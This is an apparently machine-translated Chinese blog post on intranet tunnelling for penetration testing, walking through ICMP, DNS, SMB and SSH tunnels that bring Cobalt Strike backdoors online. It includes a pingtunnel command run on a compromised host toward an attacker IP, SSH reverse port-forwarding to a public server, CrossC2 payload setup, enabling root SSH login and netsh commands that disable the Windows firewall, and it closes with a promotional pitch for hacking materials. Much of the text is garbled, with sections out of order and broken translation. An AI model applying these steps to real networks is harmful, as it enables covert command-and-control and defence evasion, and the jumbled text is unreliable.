内网安全：隧道技术详解 隧道网络

CSDN博客

隧道技术

ICMP（互联网控制消息）

Internet控制消息协议（Internet Control Message Protocol）是用于在IP网络中传递控制消息的协议。它是IP协议的补充，用于提供网络诊断、错误报告和网络管理功能。以下是有关ICMP 协议的一些重要功能：

控制消息的传递：ICMP 协议主要用于在网络内传递控制消息。这些消息可用于报告错误、提供网络状态信息、请求和响应等。

错误报告：ICMP协议定义了各种错误报告消息来通知源主机或路由器错误或问题。例如，目标不可达、超时、重定向等。

Ping 和Traceroute：ICMP 协议广泛应用于Ping 和Traceroute 等网络诊断工具中。 Ping 工具使用ICMP 回显请求和回显应答消息来测试主机之间的可达性和延迟。 Traceroute 工具使用ICMP 超时消息来跟踪数据包通过网络的路径。

路由：ICMP协议还包括用于路由的消息，例如路由器发现消息和重定向消息。这些消息用于路由器之间的通信，以更好地选择和更新网络路径。

报文格式：ICMP报文被封装在IP报文中进行传输。 ICMP 消息包括固定标头和可变长度数据字段。标头包括消息类型、代码和校验和等字段。

安全性：ICMP协议中的某些消息类型可用于网络攻击，例如ping洪水攻击和ICMP重定向攻击。因此，在网络环境中应采取适当的安全措施，如防火墙配置、流量过滤等，防止被利用，降低风险。

ICMP 协议在Internet 中发挥着重要作用，它提供网络诊断和管理功能，并允许网络管理员监控和排除网络问题。同时，ICMP为网络设备之间的通信提供了可靠的机制。

反向连接技术

反向连接实验所用网络拓扑图及说明

在CS端设置两个监听器

监听器1：IP：127.0.0.1 端口：6666

监听器2：IP：192.168.46.66 端口：7777

使用Listener 1生成后门，上传到目标机器并运行。

同时，被攻击机器执行该命令。

pingtunnel.exe -类型客户端-l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

目标将访问攻击计算机的TCP 流量发送到其本地端口6666，并在发送之前将其封装在ICMP 协议中。

网络说明

在攻击机器上执行

./pingtunnel 类型服务器

首先从收到的ICMP中提取TCP流量，完成目标机的在线CS！

工具地址：GitHub – esrrs/pingtunnel: Pingtunnel 是一个发送TCP/UDP 的工具

通过ICMP 的流量

防火墙限制说明

结论：nslookup www.baidu.com 可以返回结果，表明DNS 可能不在网络中。

虽然DNS是应用层协议，但是DNS在不同的情况下使用不同的协议。

DNS 使用TCP 进行区域传输，使用UDP 进行域名解析。

使用UDP是因为防火墙上禁用了TCP，并且DNS协议使用域名解析来建立隧道。

实验前提说明

DNS（域名系统）是Internet 上用于将域名（例如www.example.com）转换为相应IP 地址的协议。

它充当互联网的“电话簿”，提供域名和IP地址之间的映射关系。

以下是有关DNS 协议的一些重要功能：

域名解析：DNS协议的主要功能是将用户提供的域名解析为相应的IP地址。当用户在浏览器中输入域名时，浏览器会向本地DNS服务器发送DNS查询请求，并向上查询，直到找到该域名对应的IP地址。

分布式系统：DNS采用分布式设计，在全球拥有多台DNS服务器，分为根服务器、顶级域名服务器、权威域名服务器、本地DNS服务器。这种分布式架构保证了查询的效率和可靠性。

查询类型：DNS支持不同类型的查询，包括最常见的A记录查询（将域名解析为IPv4地址）和AAAA记录查询（将域名解析为IPv6地址）。还有其他类型的记录，例如CNAME 记录（别名记录）和MX 记录（邮件交换记录）。

域名层次结构：DNS使用域名层次结构将域名划分为多个级别，以便于管理和查询。域名从右向左划分，最右边的部分是顶级域名（.com、net等），左边的部分是二级域名、三级域名，很快。

缓存：为了提高查询效率，DNS服务器会对查询结果进行缓存，并将解析后的结果保存一段时间。当再次查询同一域名时，可以直接返回缓存的结果，无需重新查询。

DNSSEC：DNSSEC（DNS Security Extensions）是增强DNS安全性的扩展协议。提供对DNS 查询和响应进行数字签名的机制，以防止DNS 劫持和欺骗攻击。

DNS 协议在Internet 中发挥着重要作用。这使得用户可以使用易于记忆的域名访问您的网站，而无需记住复杂的IP 地址。同时，DNS为互联网的安全性和可靠性提供了基础支撑。

实战一：CS反向连接上线 – 拿下Win2008

一. 使用转发代理上线创建监听器

二. 上传后门执行上线

当您进行DNS查询时，如果查询到的域名不在DNS服务器的本地缓存中，则DNS服务器会访问Internet进行查询并返回结果。如果您在互联网上有定制的服务器，则可以基于DNS 协议交换数据包。但本质问题是，返回的结果应该是IP地址，但事实并非如此。

CC命令（管理APT攻击僵尸网络的命令）

隧道技术 – SMB协议

您需要准备一个域名并配置两个NS解析。 NS解析将子域名分配给其他DNS解析。

解析ns1.whgojp.top域名时，会要求DNS解析cs.whgojp.top，最终解析为IP。

这个IP就是CS服务器的地址

SMB协议介绍

实战二：SMB协议搭建隧道 正向连接 – 拿下win 2012

利用这个监听器生成后门，上传到对方服务器，并执行

单击并输入命令建立DNS 连接。

在线CS

一. 生成SMB后门

DNS协议也可以应用于通信，但是实现DNS通信需要权限，所以如果权限高的话，不用建立通信就可以上网，我个人觉得太难了。因此，这种类型的通信对于内网渗透的价值不大，但对于内网渗透可能有一定的价值。

CS不能使用这种隧道技术上网。您必须使用其他工具才能使Linux 上线。

然而，SSH隧道在通信中具有一定的重要性

二. 横向移动

SSH（安全）

Shell（安全外壳协议）是一种网络协议，用于在不安全的网络上进行安全远程登录和数据传输。加密通信和身份验证机制提供机密性、完整性和身份验证等安全功能。以下是有关SSH 协议的一些重要功能：

远程登录：SSH 协议最常见的用途是远程登录到远程计算机系统。 SSH 协议允许用户通过本地计算机上的终端访问远程计算机并与之交互，就像直接在远程计算机上工作一样。

加密通信：SSH 协议使用加密算法来保护通信的机密性和完整性。传输的数据经过加密，防止第三方窃听和篡改。常见的加密算法有AES、3DES、RC4等。

身份认证：SSH协议支持多种身份认证方式，包括基于密码的身份认证、公钥身份认证、证书身份认证等。公钥身份验证是最常见的方法，它使用公钥和私钥来提供身份验证和加密通信。

端口转发：SSH 协议还支持端口转发，它允许您将本地计算机上的端口映射到远程计算机，以实现本地和远程计算机之间的安全通信。

文件传输：SSH 协议提供安全文件传输功能，称为SCP（安全复制）和SFTP（SSH 文件传输协议）。这些功能允许用户在本地和远程计算机之间传输文件，并确保传输过程的安全性。

X11转发：SSH协议支持远程查看X11图形界面，允许用户在远程计算机上运行图形应用程序并在本地计算机上查看图形界面。

SSH协议是一种应用广泛的安全协议，适用于远程管理、文件传输、远程终端访问等场景。它提供了强大的安全性和可靠性，使远程计算机之间的通信更加安全和便捷。

三. 上线CS

您已获得Linux主机的权限，并使用Linux主机搭建了SSH隧道，并探索了Linux所在的内网。

在Linux上启用SSH协议登录。

vi /etc/ssh/sshd_config

允许根登录是

密码验证是

/etc/init.d/ssh启动

/etc/init.d/ssh 重新启动

隧道技术 – ICMP协议

构建此隧道的目的是让您能够调查您的内部网络。

关于ICMP协议

将本地访问流量从端口1.16 8080 发送到端口47.94.236.117 1234。

ssh -CfNg -R 1122:192.168.1.16:8080 root@47.94.236.117

这需要公网服务器的密码，并且使用条件很低。

公网服务器访问本地1234端口

将本地访问端口1.16 8080的流量转发到本地端口1122。

ssh -CfNg -L 1122:192.168.1.16:8080 root@192.168.1.166

只需访问这台Linux 机器上的本地端口1122

ICMP隧道搭建

项目地址：GitHub – gloxec/CrossC2: 生成CobaltStrike跨平台

有效负载

在线支持Linux、Mac、IOS、Android系统

使用插件、使用命令

使用参考：https://gloxec.github.io/CrossC2/zh_cn/

下载对应版本的loader和CNA插件，上传loader文件本地加载CNA插件，更改CNA插件配置路径上传密钥文件，然后使用命令或插件绑定HTTPS监听。原因

根据CS服务系统的类型选择插件。就我而言，我下载的是Linux。

上传到CS目录

还有两个文件，一个是从CS客户端加载的，一个是Windows加载的。

目前支持反向HTTPS和正向TCP

创建监听器

在线反向

CS有这个文件

要生成后门，可以用system选择系统。

服务器端生成的后门文件

在线的

通过程序在线连接更方便

一. 靶机TCP流量转发本地端口并封装进入ICMP协议

接管服务器权限后，防火墙过滤变得非常严格，导致隧道停止工作。仍有办法强制关闭防火墙。当然，风险仍然很大。

您可以直接关闭防火墙、删除规则或替换规则。

这一变动相对较小，因为一些程序将自己列入白名单。

木马和程序可被替换

防火墙相关命令：

显示当前防火墙状态：netsh advfirewall show allprofile

关闭防火墙：netsh advfirewall set allprofile state off

打开防火墙：netsh advfirewall set allprofile state on

恢复初始防火墙设置：netsh advfirewall restart

启用桌面防火墙： netsh advfirewall 设置所有配置文件状态

设置默认输入/输出策略：netsh advfirewall set allprofiles firewallpolicyallowinbound,allowoutbound

如果设置为拒绝使用blockinbound、blockoutbound

二. 取得TCP流量上线CS

从时代发展的角度来看，网络安全需要学习的知识是无穷无尽的，学生一旦选择开始网络安全就需要转变思维。您的入门级别越高，机会就越多。

入门阶段的知识比较复杂，如有疑问请联系我们。如果有必要我会解释一下。我的网盘里装满了很多信息。

干货主要种类有：

历年1000+CTF题库（必须包含主流、经典题）

CTF技术文档（最全中文版）

项目源码（40-50个有趣的经典实用项目及源码）

CTF大赛、网络安全、渗透测试视频（初学者）

网络安全学习路线图（告别不合格的学习）

全套CTF/渗透测试工具镜像文件

2023加密/隐形/PWN技术手册

请扫描二维码领取

#以上关于内网安全：隧道技术的详细说明，仅供参考。相关信息请参见官方公告。